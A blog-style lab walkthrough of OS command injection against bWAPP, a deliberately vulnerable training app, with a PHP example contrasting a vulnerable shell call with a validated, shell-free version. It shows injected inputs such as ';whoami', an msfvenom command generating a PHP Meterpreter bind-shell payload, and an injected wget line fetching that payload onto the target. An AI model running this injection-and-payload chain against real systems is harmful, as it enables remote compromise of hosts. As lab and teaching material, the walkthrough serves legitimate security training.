OS Command Injection Unauthorized Access

Tuesday, 2 January 2018

Hello Everyone :)


bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.

bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 100 web bugs! It covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project. The focus is not just on one specific issue... bWAPP is covering a wide range of vulnerabilities!

bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux/Windows with Apache/IIS and MySQL. It is supported on WAMP or XAMPP. Another possibility is to download bee-box, a custom VM pre-installed with bWAPP.

This project is part of the ITSEC GAMES project. You can find more about the ITSEC GAMES and bWAPP projects on our blog.

For security-testing and educational purposes only!


OS Command Injection

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.

In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands.

Code ;ls

Code ;pwd

Code ;whoami
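Why inputs such as ;whoami work, and how the server side should handle them, shown as an added example that is not bWAPP's own source. It assumes a form field named target that is passed to nslookup; the function names are hypothetical.

```php
<?php
// Added example, not bWAPP source. "target" and nslookup are assumed names.

// Vulnerable: the input is concatenated into a string that /bin/sh parses,
// so "example.com;whoami" runs nslookup and then whoami.
function lookup_vulnerable(string $target): string
{
    return (string) shell_exec('nslookup ' . $target);
}

// Allow-list check: a literal IP address, or a hostname made only of
// letters, digits, dots and hyphens that does not start with "-".
function is_valid_target(string $target): bool
{
    if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    return preg_match('/\A(?!-)[A-Za-z0-9.-]{1,253}\z/', $target) === 1;
}

// Hardened: validate first, then execute without a shell.
function lookup_hardened(string $target): ?string
{
    if (!is_valid_target($target)) {
        return null; // reject; do not try to "clean" the input
    }
    // Array form of proc_open (PHP 7.4+) starts the program directly,
    // so ; | & ` $( ) are never interpreted as shell syntax.
    $proc = proc_open(['nslookup', $target], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out === false ? null : $out;
}

// Constructed inputs: the payloads shown above plus two legitimate values.
foreach ([';ls', ';pwd', ';whoami', 'example.com;whoami', 'example.com', '192.0.2.10'] as $input) {
    printf("%-20s %s\n", $input, is_valid_target($input) ? 'accepted' : 'rejected');
}
```

The loop only exercises the validator, so it runs offline; the four inputs containing ";" are rejected and the two legitimate values are accepted.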

Using the MSFvenom Command Line Interface

Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.

Msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.
The advantages of msfvenom are:
  • One single tool
  • Standardized command line options
  • Increased speed



msfvenom -p php/meterpreter/bind_tcp LHOST=ipaddress LPORT=4448 > berkdusunur.php

Code ;wget http://ip.add.re.ss/berkdusunur.php

And Meterpreter :)

Thank You For Reading 

You can follow us on Twitter @berkdusunur

